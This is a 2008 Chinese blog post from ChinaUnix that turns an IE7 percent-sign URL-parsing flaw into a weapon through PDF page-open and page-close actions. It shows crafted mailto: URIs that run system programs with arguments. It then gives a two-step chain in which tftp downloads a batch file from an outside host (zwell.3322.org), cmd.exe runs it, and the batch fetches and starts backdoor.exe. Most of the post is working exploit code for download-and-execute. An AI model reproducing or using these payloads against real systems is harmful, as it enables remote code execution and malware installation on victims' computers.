Chinaunix首页 | 论坛 | 博客
  • 博客访问: 499624
  • 博文数量: 1496
  • 博客积分: 79800
  • 博客等级: 大将
  • 技术积分: 9940
  • 用 户 组: 普通用户
  • 注册时间: 2008-09-09 13:22
文章分类

全部博文(1496)

文章存档

2011年(1)

2008年(1495)

我的朋友

分类:

2008-09-09 17:14:58

  右键另存再打开测试文档,否则会调用IE的插件打开,测试会失败。如果你硬要通过点击打开的话,点击这里吧,嘿嘿,这本身也是IE的一个解析漏洞。

  在看到这个漏洞的时候,一时还没有想到怎么利用。后来结合去年有一个关于pdf actions隐患的这么一个问题(参看),pdf中的actions中打开页面的事件刚好可以用来利用。

  Petko Petkov之前放出话说pdf的0day应该也就是指的是这个漏洞了。利用这个漏洞首先需要安装IE7,在URL解析时遇到百分号(%)会执行后面的程序。放出来的利用方式为:

  以下是代码片段:

  mailto:test%……/……/……/……/windows/system32/calc.exe".cmd

  http:%xx……/……/……/……/……/……/……/……/……/……/……/windows/system32/calc.exe".

  利用这种URL咱们可以执行系统中的任意命令了,但是有一点用处的系统命令都得加参数才能用啊。怎么加入参数呢?反正放在。cmd前就行,但是必须放在引号(")后面,呵呵,其实没的选。经过测试,下面的语句就ok了:

  以下是代码片段:

  mailto:test%……/……/……/……/windows/system32/net.exe" “user”。cmd

  要有多个参数的话就的

  以下是代码片段:

  mailto:test%……/……/……/……/windows/system32/xxx.exe" “argv1” “argv2”。cmd

  到这里,基本上大家也就有了利用办法了,网络COPY命令,TFTP等都行啊。不过得分两步:

  1.程序

  2.执行程序

  还有一点要注意的,最好在打开页面事件和关闭页面时间中加入上面两步,以免因为网速问题造成程序执行不成功。

  以下是代码片段:

  mailto:test%……\……\……\……\windows\system32\tftp.exe" "-i" "zwell.3322.org"

  "GET" "a.bat" "c:\a".cmd

  mailto:test%……\……\……\……\windows\system32\cmd.exe" "/c c:\a".cmd

  在zwell.3322.org上我搭建了一个TFTP,里面放有一个a.cmd,内容就是再去执行一个程序。

  在pdf打开首页时执行第一条指令,上的a.bat,保存为a.cmd(为什么是cmd,大家可以思考一下)。

  在离开该页面时,再执行已经下载的a.cmd,其实他是个bat文件,内容是:

  以下是代码片段:

  cmd /c tftp -i zwell.3322.org GET backdoor.exe c:\b.exe

  start c:\b.exe

  好了,现在下载了backdoor.exe程序(这只是一个notepad程序,我重命名了)并且执行了。

【责编:John】

--------------------next---------------------

阅读(134) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~